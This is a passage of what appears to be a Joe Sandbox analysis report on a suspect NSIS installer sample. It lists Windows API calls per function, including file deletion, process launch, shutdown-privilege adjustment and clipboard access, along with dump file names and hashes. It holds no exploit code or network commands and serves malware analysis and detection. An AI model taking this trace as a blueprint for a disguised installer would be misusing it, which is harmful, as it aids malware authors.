                                                                                                                                                                                      • Part of subcall function 00406317: MoveFileExW.KERNEL32(?,?,00000005,00405E15,?,00000000,000000F1,?,?,?,?,?), ref: 00406321
                                                                                                                                                                                    • CopyFileW.KERNEL32(00442800,00437800,00000001,00441800,00000000), ref: 00403A34
                                                                                                                                                                                      • Part of subcall function 00405B3A: CreateProcessW.KERNEL32(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B63
                                                                                                                                                                                      • Part of subcall function 00405B3A: CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B70
                                                                                                                                                                                      • Part of subcall function 004068B4: FindFirstFileW.KERNEL32(74DF3420,0042FAB8,0042F270,00405F77,0042F270,0042F270,00000000,0042F270,0042F270,74DF3420,?,00441800,00405C83,?,74DF3420,00441800), ref: 004068BF
                                                                                                                                                                                      • Part of subcall function 004068B4: FindClose.KERNEL32(00000000), ref: 004068CB
                                                                                                                                                                                    • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A82
                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00403A9F
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00438000,00438000,?,00437800,00000000), ref: 00403AA6
                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AC2
                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AC9
                                                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403ADE
                                                                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403B01
                                                                                                                                                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 00403B26
                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00403B49
                                                                                                                                                                                      • Part of subcall function 00405B05: CreateDirectoryW.KERNEL32(?,00000000,00403525,00441800,00441800,00441800,00441800,00441800,0040381C,?,00000008,0000000A,0000000C), ref: 00405B0B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                                                                                                                                                    • String ID: Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                                                                                                                                                    • API String ID: 1813718867-2779336553
                                                                                                                                                                                    • Opcode ID: 32ccfccbee9d2f95e380080254fd3e205a9f5d358a382af22345ff9c53e9cdef
                                                                                                                                                                                    • Instruction ID: 6c1349364f4d22fadfcc29bbd5f82b0434b4f5ba6e08f6571c64e8404a3f48da
                                                                                                                                                                                    • Opcode Fuzzy Hash: 32ccfccbee9d2f95e380080254fd3e205a9f5d358a382af22345ff9c53e9cdef
                                                                                                                                                                                    • Instruction Fuzzy Hash: 64F10270604301ABD320AF659D45B2B7AE8EF8570AF10483EF581B22D1DB7DDA45CB6E
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,74DF3420,00441800,0043F000), ref: 00405C8C
                                                                                                                                                                                    • lstrcatW.KERNEL32(0042EA70,\*.*,0042EA70,?,?,74DF3420,00441800,0043F000), ref: 00405CD4
                                                                                                                                                                                    • lstrcatW.KERNEL32(?,0040A014,?,0042EA70,?,?,74DF3420,00441800,0043F000), ref: 00405CF7
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,0040A014,?,0042EA70,?,?,74DF3420,00441800,0043F000), ref: 00405CFD
                                                                                                                                                                                    • FindFirstFileW.KERNEL32(0042EA70,?,?,?,0040A014,?,0042EA70,?,?,74DF3420,00441800,0043F000), ref: 00405D0D
                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405DAD
                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00405DBC
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                    • String ID: \*.*$pB
                                                                                                                                                                                    • API String ID: 2035342205-1006940126
                                                                                                                                                                                    • Opcode ID: 22bb0f4a0285bec378f517b8b25bc548c1454a96ed25189fc1485adbf29640f7
                                                                                                                                                                                    • Instruction ID: 3df5019795aaf58f6817f8e3609a5bcb0d9fa216103f8ca083ea3247371bac5c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 22bb0f4a0285bec378f517b8b25bc548c1454a96ed25189fc1485adbf29640f7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2441B231400A14BADB21BB65DC8DAAF7678EF81714F24813BF801B11D1DB7C4A81DEAE
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,00000403), ref: 00405779
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00405788
                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 004057C5
                                                                                                                                                                                    • GetSystemMetrics.USER32(00000002), ref: 004057CC
                                                                                                                                                                                    • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057ED
                                                                                                                                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057FE
                                                                                                                                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405811
                                                                                                                                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040581F
                                                                                                                                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405832
                                                                                                                                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405854
                                                                                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405868
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00405889
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405899
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004058B2
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058BE
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003F8), ref: 00405797
                                                                                                                                                                                      • Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004058DB
                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_000056AF,00000000), ref: 004058E9
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004058F0
                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00405914
                                                                                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405919
                                                                                                                                                                                    • ShowWindow.USER32(00000008), ref: 00405963
                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405997
                                                                                                                                                                                    • CreatePopupMenu.USER32 ref: 004059A8
                                                                                                                                                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004059BC
                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004059DC
                                                                                                                                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059F5
                                                                                                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A2D
                                                                                                                                                                                    • OpenClipboard.USER32(00000000), ref: 00405A3D
                                                                                                                                                                                    • EmptyClipboard.USER32 ref: 00405A43
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A4F
                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00405A59
                                                                                                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A6D
                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00405A8D
                                                                                                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00405A98
                                                                                                                                                                                    • CloseClipboard.USER32 ref: 00405A9E
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                    • String ID: {
                                                                                                                                                                                    • API String ID: 590372296-366298937
                                                                                                                                                                                    • Opcode ID: 6951b3530aa72caf7521df0bf8db88f5d1408e2bb92485539c1303395de87c8c
                                                                                                                                                                                    • Instruction ID: 234ab3d0ec1f6487b719ed7b99e1d6b4405f443d9e8d78e252fa94ab3ac4d3a1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6951b3530aa72caf7521df0bf8db88f5d1408e2bb92485539c1303395de87c8c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 34B139B1900608FFDB11AF60DD89AAE7B79FB48355F00813AFA41BA1A0C7785A51DF58
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003F9), ref: 00404F5B
                                                                                                                                                                                    • GetDlgItem.USER32(?,00000408), ref: 00404F66
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404FB0
                                                                                                                                                                                    • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FC7
                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000FC,00405550), ref: 00404FE0
                                                                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FF4
                                                                                                                                                                                    • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405006
                                                                                                                                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 0040501C
                                                                                                                                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405028
                                                                                                                                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 0040503A
                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0040503D
                                                                                                                                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405068
                                                                                                                                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405074
                                                                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040510F
                                                                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040513F
                                                                                                                                                                                      • Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519
                                                                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405153
                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00405181
                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040518F
                                                                                                                                                                                    • ShowWindow.USER32(?,00000005), ref: 0040519F
                                                                                                                                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040529A
                                                                                                                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052FF
                                                                                                                                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405314
                                                                                                                                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405338
                                                                                                                                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405358
                                                                                                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 0040536D
                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 0040537D
                                                                                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053F6
                                                                                                                                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 0040549F
                                                                                                                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004054AE
                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 004054D9
                                                                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00405527
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003FE), ref: 00405532
                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00405539
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                    • String ID: $M$N
                                                                                                                                                                                    • API String ID: 2564846305-813528018
                                                                                                                                                                                    • Opcode ID: 14683326fe5d0e21a3b01d942e888f99a0d9647cceadcd168bf81575faddcc86
                                                                                                                                                                                    • Instruction ID: 91097811874ce85ba3cc7540bcf7dd58db25a3d6f071223140e4d1ec27d7ea12
                                                                                                                                                                                    • Opcode Fuzzy Hash: 14683326fe5d0e21a3b01d942e888f99a0d9647cceadcd168bf81575faddcc86
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C029C70900608AFDF20DF94DD85AAF7BB5FB85314F10817AE611BA2E1D7798A41CF58
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404013
                                                                                                                                                                                    • ShowWindow.USER32(?), ref: 00404033
                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404045
                                                                                                                                                                                    • ShowWindow.USER32(?,00000004), ref: 0040405E
                                                                                                                                                                                    • DestroyWindow.USER32 ref: 00404072
                                                                                                                                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040408B
                                                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 004040AA
                                                                                                                                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040BE
                                                                                                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 004040C5
                                                                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 00404170
                                                                                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 0040417A
                                                                                                                                                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 00404194
                                                                                                                                                                                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041E5
                                                                                                                                                                                    • GetDlgItem.USER32(?,00000003), ref: 0040428B
                                                                                                                                                                                    • ShowWindow.USER32(00000000,?), ref: 004042AC
                                                                                                                                                                                    • EnableWindow.USER32(?,?), ref: 004042BE
                                                                                                                                                                                    • EnableWindow.USER32(?,?), ref: 004042D9
                                                                                                                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042EF
                                                                                                                                                                                    • EnableMenuItem.USER32(00000000), ref: 004042F6
                                                                                                                                                                                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040430E
                                                                                                                                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404321
                                                                                                                                                                                    • lstrlenW.KERNEL32(0042CA68,?,0042CA68,00000000), ref: 0040434B
                                                                                                                                                                                    • SetWindowTextW.USER32(?,0042CA68), ref: 0040435F
                                                                                                                                                                                    • ShowWindow.USER32(?,0000000A), ref: 00404493
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1860320154-0
                                                                                                                                                                                    • Opcode ID: df8d1fa02ff149c62ea57a685de79d9d3ef227f732b6982a07419eaff96d62a7
                                                                                                                                                                                    • Instruction ID: 911e0a6aef898d83942fe666095560f38e6effa11f08765efd6836b1f10f2e9c
                                                                                                                                                                                    • Opcode Fuzzy Hash: df8d1fa02ff149c62ea57a685de79d9d3ef227f732b6982a07419eaff96d62a7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 29C1B0B1500204BBDB206F61EE89A2B3A68FB85756F01053EF781B51F0CB3958929B2D
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040694B: GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
                                                                                                                                                                                      • Part of subcall function 0040694B: GetProcAddress.KERNEL32(00000000,?), ref: 00406978
                                                                                                                                                                                    • lstrcatW.KERNEL32(00441000,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,74DF3420,00441800,00000000,0043F000,00008001), ref: 00403CAA
                                                                                                                                                                                    • lstrlenW.KERNEL32(004326A0,?,?,?,004326A0,00000000,0043F800,00441000,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,74DF3420), ref: 00403D2A
                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00432698,.exe,004326A0,?,?,?,004326A0,00000000,0043F800,00441000,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000), ref: 00403D3D
                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(004326A0), ref: 00403D48
                                                                                                                                                                                    • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,0043F800), ref: 00403D91
                                                                                                                                                                                      • Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB
                                                                                                                                                                                    • RegisterClassW.USER32(004336A0), ref: 00403DCE
                                                                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DE6
                                                                                                                                                                                    • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E1B
                                                                                                                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00403E51
                                                                                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit20W,004336A0), ref: 00403E7D
                                                                                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit,004336A0), ref: 00403E8A
                                                                                                                                                                                    • RegisterClassW.USER32(004336A0), ref: 00403E93
                                                                                                                                                                                    • DialogBoxParamW.USER32(?,00000000,00403FD7,00000000), ref: 00403EB2
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                    • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                                                    • API String ID: 1975747703-1115850852
                                                                                                                                                                                    • Opcode ID: bbb1e3748a54a273649d0fbd54a0890110e87f86c4ca5900aa60a5a95311a30e
                                                                                                                                                                                    • Instruction ID: b78af383561608ccb802af496d710159af2d94eef556b4765221653e5b422f1b
                                                                                                                                                                                    • Opcode Fuzzy Hash: bbb1e3748a54a273649d0fbd54a0890110e87f86c4ca5900aa60a5a95311a30e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9F61C270100640BED220AF66ED46F2B3A6CEB85B5AF50013FF945B62E2DB7C59418B6D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404733
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404747
                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404764
                                                                                                                                                                                    • GetSysColor.USER32(?), ref: 00404775
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404783
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404791
                                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 00404796
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004047A3
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047B8
                                                                                                                                                                                    • GetDlgItem.USER32(?,0000040A), ref: 00404811
                                                                                                                                                                                    • SendMessageW.USER32(00000000), ref: 00404818
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404843
                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404886
                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00404894
                                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 00404897
                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 004048B0
                                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 004048B3
                                                                                                                                                                                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048E2
                                                                                                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048F4
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                                                    • String ID: N
                                                                                                                                                                                    • API String ID: 3103080414-1130791706
                                                                                                                                                                                    • Opcode ID: 04e13e5971a3aaf2d7c3f6bec99ed017c89c89abbf6057be99a5caf0d4384f9a
                                                                                                                                                                                    • Instruction ID: 3ad42440e7936429012ccc374b67200ab01768f99e4ad58672f49272ac14a637
                                                                                                                                                                                    • Opcode Fuzzy Hash: 04e13e5971a3aaf2d7c3f6bec99ed017c89c89abbf6057be99a5caf0d4384f9a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E6181B1900209BFDB10AF60DD85EAA7B69FB84315F00853AFA05B62D0C779A951DF98
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                    • DrawTextW.USER32(00000000,00433700,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.2940420424.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.2940400852.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940442953.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940462982.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.2940489986.0000000000454000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_Beskftigelsesmssiges.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                    • String ID: F
                                                                                                                                                                                    • API String ID: 941294808-1304234792
